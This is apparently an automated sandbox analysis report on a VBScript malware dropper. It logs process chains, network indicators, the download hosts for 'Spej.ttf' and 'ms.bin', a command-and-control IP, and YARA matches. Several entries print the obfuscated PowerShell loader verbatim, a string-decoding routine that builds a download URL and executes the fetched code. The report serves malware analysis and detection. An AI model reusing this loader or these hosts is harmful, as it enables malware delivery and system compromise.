                    Source: Binary string: wntdll.pdb source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficTCP traffic: 192.168.2.5:49815 -> 91.92.252.226:7127
                    Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49771 -> 103.120.177.150:443
                    Source: global trafficHTTP traffic detected: GET /ms/ms.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.royalengineeringllc.comCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05949F64 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,9_2_05949F64
                    Source: global trafficHTTP traffic detected: GET /ms/Spej.ttf HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 05 Feb 2024 11:01:15 GMTUser-Agent: Microsoft BITS/7.8Host: www.astenterprises.com.pk
                    Source: global trafficHTTP traffic detected: GET /ms/ms.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.royalengineeringllc.comCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
                    Source: global trafficDNS traffic detected: DNS query: www.royalengineeringllc.com
                    Source: powershell.exe, 00000005.00000002.2550855628.0000000007F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: svchost.exe, 00000004.00000002.3339991717.000002A7978A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000005.00000002.2544913073.00000000070F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co/
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315FF93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: svchost.exe, 00000004.00000002.3341467361.000002A79CEED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341611453.000002A79CF0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/
                    Source: svchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ice
                    Source: svchost.exe, 00000004.00000002.3340446288.000002A798102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2203585000.000002A79CD25000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341139062.000002A79CE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341740612.000002A79D080000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2177178561.000002A79CD21000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341763948.000002A79D290000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3340587401.000002A798640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttf
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EFBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttfP
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttfXR
                    Source: svchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk:443/ms/Spej.ttf
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.bin
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.bin0t
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.binGu
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.5:49771 version: TLS 1.2
                    Source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_0d1158bd-8
                    Source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_4a94ac3d-f
                    Source: Yara matchFile source: 7.3.wab.exe.256f0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.3.dialer.exe.5930000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.3.dialer.exe.5710000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.wab.exe.254d0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2780, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: amsi32_4856.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E95A761_2_00007FF848E95A76
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E89A6A1_2_00007FF848E89A6A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E8CA601_2_00007FF848E8CA60
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E968221_2_00007FF848E96822
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E870581_2_00007FF848E87058
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA0C625_2_02DA0C62
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA12485_2_02DA1248
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA1CF05_2_02DA1CF0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02DA1C445_2_02DA1C44
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_073183E85_2_073183E8
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059635249_2_05963524
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059535739_2_05953573
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05962CBD9_2_05962CBD
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_0595BC119_2_0595BC11
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_0595C4589_2_0595C458
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05963F8C9_2_05963F8C
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05967FA29_2_05967FA2
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_0595C7EB9_2_0595C7EB
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_0594D73D9_2_0594D73D
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059627219_2_05962721
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059486539_2_05948653
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059538DB9_2_059538DB
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059620099_2_05962009
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05965BA49_2_05965BA4
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05963BC59_2_05963BC5
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_0594834D9_2_0594834D
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_059622B49_2_059622B4
                    Source: F8HYX5HOgA.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5806
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5806
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5806Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5806Jump to behavior
                    Source: amsi32_4856.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@11/11@3/4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848E8AF80 CoCreateInstance,1_2_00007FF848E8AF80
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
                    Source: C:\Windows\SysWOW64\dialer.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgxm3ru0.slx.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5708
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4856
                    Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: F8HYX5HOgA.vbsVirustotal: Detection: 46%
                    Source: F8HYX5HOgA.vbsReversingLabs: Detection: 42%
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 